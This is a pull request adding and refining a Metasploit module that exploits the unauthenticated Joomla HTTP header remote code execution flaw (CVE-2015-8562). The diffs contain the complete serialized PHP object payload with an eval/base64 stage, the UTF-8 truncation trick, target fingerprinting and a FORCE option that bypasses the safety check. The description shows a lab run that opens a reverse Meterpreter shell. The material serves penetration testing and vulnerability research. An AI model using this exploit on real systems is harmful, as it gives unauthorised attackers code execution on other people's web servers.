### PR TITLE
Add 2015-8562 - Joomla RCE module

### DIFF
--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -19,7 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
           by sending an UTF-8 character. The custom created payload is then executed once the session is read
           from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.
           In later versions the deserialisation of invalid session data stops on the first error and the
-          exploit will not work.
+          exploit will not work. On Ubuntu the PHP Patch was included in versions 5.5.9+dfsg-1ubuntu4.13 and
+          5.3.10-1ubuntu3.20.
       },
       'Author'	=>
         [

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -136,8 +136,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'     => target_uri.path,
       'headers' => { datastore['HEADER'] => get_payload }
     })
+    fail_with(Failure::Unknown, 'No response') if res.nil?
     session_cookie = res.get_cookies
-    res = send_request_cgi({
+    send_request_cgi({
       'method'  => 'GET',
       'uri'     => target_uri.path,
       'cookie'  => session_cookie,

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['Joomla < 3.4.6', {}]],
+      'Targets'        => [['Joomla 1.5.0 - 3.4.5', {}]],
       'DisclosureDate' => 'Dec 14 2015',
       'DefaultTarget'  => 0)
     )
@@ -140,13 +140,19 @@ class Metasploit3 < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
+  # gets a random 4 byte UTF-8 character
+  def get_terminator
+    # valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
+    [rand(0x10000..0x10ffff)].pack('U*')
+  end
+
   def get_payload(header_name)
     pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
-    middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
+    pre_pay = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
     pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
-    middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
-    post = "\xF0\x9D\x8C\x86"
-    return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
+    post_pay = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
+    t1000 = get_terminator
+    return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{t1000}"
   end
 
   def print_status(msg='')

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
     php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
     vprint_status("Found PHP version: #{php_version}")
 
-    if php_version > '5.3'
+    if php_version >= '5.4'
       vprint_error('This module currently does not work against this PHP version')
       return Exploit::CheckCode::Safe
     end

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [['Joomla', {}]],
+      'Targets'        => [['Joomla < 3.4.6', {}]],
       'DisclosureDate' => 'Dec 14 2015',
       'DefaultTarget'  => 0)
     )
@@ -140,10 +140,10 @@ class Metasploit3 < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
-  def get_payload
+  def get_payload(header_name)
     pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
     middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
-    pay = "eval(base64_decode($_SERVER['HTTP_CMD']));JFactory::getConfig();exit;"
+    pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
     middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
     post = "\xF0\x9D\x8C\x86"
     return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
@@ -164,10 +164,11 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("Sending payload ...")
+    header_name = Rex::Text.rand_text_alpha_upper(5)
     res = send_request_cgi({
       'method'  => 'GET',
       'uri'     => target_uri.path,
-      'headers' => { datastore['HEADER'] => get_payload }
+      'headers' => { datastore['HEADER'] => get_payload(header_name) }
     })
     fail_with(Failure::Unknown, 'No response') if res.nil?
     session_cookie = res.get_cookies
@@ -176,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'     => target_uri.path,
       'cookie'  => session_cookie,
       'headers' => {
-        'CMD' => Rex::Text.encode_base64(payload.encoded)
+        header_name => Rex::Text.encode_base64(payload.encoded)
       }
     })
   end

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 
@@ -51,6 +51,11 @@ class Metasploit3 < Msf::Exploit::Remote
         OptString.new('TARGETURI', [ true,  'The path to joomla', '/' ]),
         OptEnum.new('HEADER', [ true,  'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
       ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
+      ], self.class)
   end
 
   def check
@@ -80,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #   http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
     if rest && rest.include?('ubuntu')
       sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
-      vprint_status("Found Ubuntu PHP version: #{res.headers['X-Powered-By']}")
+      vprint_status("Found Ubuntu PHP version #{res.headers['X-Powered-By']}")
 
       if version > Gem::Version.new('5.5.9')
         vulnerable = false
@@ -93,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     elsif rest && rest.include?('+deb')
       sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
-      vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
+      vprint_status("Found Debian PHP version #{res.headers['X-Powered-By']}")
 
       if version > Gem::Version.new('5.4.45')
         vulnerable = false
@@ -103,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
         vulnerable = true
       end
     else
-      vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
+      vprint_status("Found PHP version #{res.headers['X-Powered-By']}")
       vulnerable = true if version <= Gem::Version.new('5.4.44')
       vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
       vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
@@ -117,8 +122,9 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
     if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
       joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
-      if joomla_version
-        return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
+      unless joomla_version.empty?
+        vprint_status("Detected Joomla version #{joomla_version}")
+        return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
       end
     end
 
@@ -131,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    Exploit::CheckCode::Unknown
+    Exploit::CheckCode::Safe
   end
 
   def get_payload
@@ -152,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    if check == Exploit::CheckCode::Safe
+    if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
       print_error('Target seems safe, so we will not continue.')
       return
     end

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -17,7 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote
           Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5 to 3.4.
           By storing user supplied headers in the databases session table it's possible to truncate the input
           by sending an UTF-8 character. The custom created payload is then executed once the session is read
-          from the databse
+          from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.
+          In later versions the deserialisation of invalid session data stops on the first error and the
+          exploit will not work.
       },
       'Author'	=>
         [
@@ -32,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],
           ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],
           ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],
-          ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html']
+          ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],
+          ['URL', 'https://bugs.php.net/bug.php?id=70219']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -69,11 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_status("Found PHP version: #{php_version}")
 
     version = Gem::Version.new(php_version)
-
     vulnerable = false
-    vulnerable = true if version <= Gem::Version.new('5.4.44')
-    vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
-    vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
 
     # check for ubuntu specific versions. Was fixed in
     # * 5.5.9+dfsg-1ubuntu4.13
@@ -85,13 +81,19 @@ class Metasploit3 < Msf::Exploit::Remote
       sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
       vprint_status("Found Ubuntu PHP version: #{php_version}-#{sub_version}")
 
-      if version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) < Gem::Version.new(4.13)
-        vulnerable = true
-      elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) < Gem::Version.new(3.20)
-        vulnerable = true
-      else
+      if version > Gem::Version.new('5.5.9')
         vulnerable = false
+      elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')
+        vulnerable = false
+      elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')
+        vulnerable = false
+      else
+        vulnerable = true
       end
+    else
+      vulnerable = true if version <= Gem::Version.new('5.4.44')
+      vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
+      vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
     end
 
     unless vulnerable

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Joomla HTTP Header Unauthenticated Remote Code Execution',
       'Description'    => %q{
-          Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5 to 3.4.
+          Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.
           By storing user supplied headers in the databases session table it's possible to truncate the input
           by sending an UTF-8 character. The custom created payload is then executed once the session is read
           from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Unknown
     end
 
-    php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
+    php_version, rest = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)(?:-(.+))?/i).flatten || ''
     vprint_status("Found PHP version: #{php_version}")
 
     version = Gem::Version.new(php_version)
@@ -74,6 +74,18 @@ class Metasploit3 < Msf::Exploit::Remote
     vulnerable = true if version <= Gem::Version.new('5.4.44')
     vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
     vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
+
+    # check for ubuntu specific versions. Was fixed in 5.5.9+dfsg-1ubuntu4.13
+    # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.14/changelog
+    if rest && rest.include?('ubuntu') && version == Gem::Version.new('5.5.9')
+      sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
+      vprint_status("Found Ubuntu PHP version: #{sub_version}")
+      if Gem::Version.new(sub_version) < Gem::Version.new(4.13)
+        vulnerable = true
+      else
+        vulnerable = false
+      end
+    end
 
     unless vulnerable
       vprint_error('This module currently does not work against this PHP version')

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -120,13 +120,13 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Sending payload ...")
     res = send_request_cgi({
       'method'    => 'GET',
-      'uri'       => target_uri.to_s,
+      'uri'       => target_uri.path,
       'headers' => { datastore['HEADER'] => get_payload }
     })
     session_cookie = res.get_cookies
     res = send_request_cgi({
       'method'    => 'GET',
-      'uri'       => target_uri.to_s,
+      'uri'       => target_uri.path,
       'cookie'   => session_cookie,
       'headers' => {
         'CMD' => Rex::Text.encode_base64(payload.encoded)

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -114,6 +114,14 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe
     end
 
+    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
+    if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
+      joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
+      if joomla_version
+        return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
+      end
+    end
+
     res.get_html_meta_elements.each do |element|
       if element.attributes['name'] &&
         /^generator$/i === element.attributes['name'] &&
@@ -122,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
         return Exploit::CheckCode::Detected
       end
     end
-
-    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'plugins', 'system', 'cache', 'cache.xml') })
-    return Exploit::CheckCode::Detected if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
 
     Exploit::CheckCode::Unknown
   end

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -65,7 +65,13 @@ class Metasploit3 < Msf::Exploit::Remote
     php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
     vprint_status("Found PHP version: #{php_version}")
 
-    if php_version >= '5.4'
+    vulnerable = false
+    vulnerable = true if php_version < '5.4'
+    vulnerable = true if php_version.start_with?('5.4') && php_version < '5.4.45'
+    vulnerable = true if php_version.start_with?('5.5') && php_version < '5.5.29'
+    vulnerable = true if php_version.start_with?('5.6') && php_version < '5.6.13'
+
+    unless vulnerable
       vprint_error('This module currently does not work against this PHP version')
       return Exploit::CheckCode::Safe
     end
@@ -78,6 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote
         return Exploit::CheckCode::Detected
       end
     end
+
+    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'plugins', 'system', 'cache', 'cache.xml') })
+    return Exploit::CheckCode::Detected if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
 
     Exploit::CheckCode::Safe
   end

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'plugins', 'system', 'cache', 'cache.xml') })
     return Exploit::CheckCode::Detected if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
 
-    Exploit::CheckCode::Safe
+    Exploit::CheckCode::Unknown
   end
 
   def get_payload

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -75,12 +75,19 @@ class Metasploit3 < Msf::Exploit::Remote
     vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
     vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
 
-    # check for ubuntu specific versions. Was fixed in 5.5.9+dfsg-1ubuntu4.13
-    # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.14/changelog
-    if rest && rest.include?('ubuntu') && version == Gem::Version.new('5.5.9')
+    # check for ubuntu specific versions. Was fixed in
+    # * 5.5.9+dfsg-1ubuntu4.13
+    # * 5.3.10-1ubuntu3.20
+    # Changelogs (search for CVE-2015-6835):
+    #   http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog
+    #   http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog
+    if rest && rest.include?('ubuntu')
       sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
-      vprint_status("Found Ubuntu PHP version: #{sub_version}")
-      if Gem::Version.new(sub_version) < Gem::Version.new(4.13)
+      vprint_status("Found Ubuntu PHP version: #{php_version}-#{sub_version}")
+
+      if version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) < Gem::Version.new(4.13)
+        vulnerable = true
+      elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) < Gem::Version.new(3.20)
         vulnerable = true
       else
         vulnerable = false

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -68,11 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote
     php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
     vprint_status("Found PHP version: #{php_version}")
 
+    version = Gem::Version.new(php_version)
+
     vulnerable = false
-    vulnerable = true if php_version < '5.4'
-    vulnerable = true if php_version.start_with?('5.4') && php_version < '5.4.45'
-    vulnerable = true if php_version.start_with?('5.5') && php_version < '5.5.29'
-    vulnerable = true if php_version.start_with?('5.6') && php_version < '5.6.13'
+    vulnerable = true if version <= Gem::Version.new('5.4.44')
+    vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
+    vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
 
     unless vulnerable
       vprint_error('This module currently does not work against this PHP version')

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        => [['Joomla', {}]],
       'DisclosureDate' => 'Dec 14 2015',
       'DefaultTarget'  => 0)
-      )
+    )
 
     register_options(
       [
@@ -119,15 +119,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("Sending payload ...")
     res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => target_uri.path,
+      'method'  => 'GET',
+      'uri'     => target_uri.path,
       'headers' => { datastore['HEADER'] => get_payload }
     })
     session_cookie = res.get_cookies
     res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => target_uri.path,
-      'cookie'   => session_cookie,
+      'method'  => 'GET',
+      'uri'     => target_uri.path,
+      'cookie'  => session_cookie,
       'headers' => {
         'CMD' => Rex::Text.encode_base64(payload.encoded)
       }

--- a/modules/exploits/multi/http/joomla_http_header_rce.rb
+++ b/modules/exploits/multi/http/joomla_http_header_rce.rb
@@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
           by sending an UTF-8 character. The custom created payload is then executed once the session is read
           from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.
           In later versions the deserialisation of invalid session data stops on the first error and the
-          exploit will not work. On Ubuntu the PHP Patch was included in versions 5.5.9+dfsg-1ubuntu4.13 and
-          5.3.10-1ubuntu3.20.
+          exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and
+          5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.
       },
       'Author'	=>
         [
@@ -67,20 +67,20 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     php_version, rest = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)(?:-(.+))?/i).flatten || ''
-    vprint_status("Found PHP version: #{php_version}")
-
     version = Gem::Version.new(php_version)
     vulnerable = false
 
-    # check for ubuntu specific versions. Was fixed in
+    # check for ubuntu and debian specific versions. Was fixed in
     # * 5.5.9+dfsg-1ubuntu4.13
     # * 5.3.10-1ubuntu3.20
-    # Changelogs (search for CVE-2015-6835):
+    # * 5.4.45-0+deb7u1
+    # Changelogs (search for CVE-2015-6835 or #70219):
     #   http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog
     #   http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog
+    #   http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
     if rest && rest.include?('ubuntu')
       sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
-      vprint_status("Found Ubuntu PHP version: #{php_version}-#{sub_version}")
+      vprint_status("Found Ubuntu PHP version: #{res.headers['X-Powered-By']}")
 
       if version > Gem::Version.new('5.5.9')
         vulnerable = false
@@ -91,7 +91,19 @@ class Metasploit3 < Msf::Exploit::Remote
       else
         vulnerable = true
       end
+    elsif rest && rest.include?('+deb')
+      sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
+      vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
+
+      if version > Gem::Version.new('5.4.45')
+        vulnerable = false
+      elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'
+        vulnerable = false
+      else
+        vulnerable = true
+      end
     else
+      vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
       vulnerable = true if version <= Gem::Version.new('5.4.44')
       vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
       vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))


### PR DESCRIPTION
This exploit only works on PHP versions before 5.4.45 (including 5.3.x), 5.5.29 and 5.6.13.

Vulnerable Version:
https://github.com/joomla/joomla-cms/releases/tag/3.4.5

```
msf exploit(joomla_user_agent_rce) > show options

Module options (exploit/multi/http/joomla_user_agent_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HEADER     USER-AGENT       yes       The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.211.55.23     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /joomla/         yes       The path to joomla
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Joomla


msf exploit(joomla_user_agent_rce) > run

[*] Started reverse handler on 10.211.55.2:4444
[*] Sending payload ...
[*] Sending stage (33068 bytes) to 10.211.55.23
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.23:60834) at 2015-12-15 17:22:22 +0100

^C[-] Exploit failed: Interrupt

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:51:20 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
```
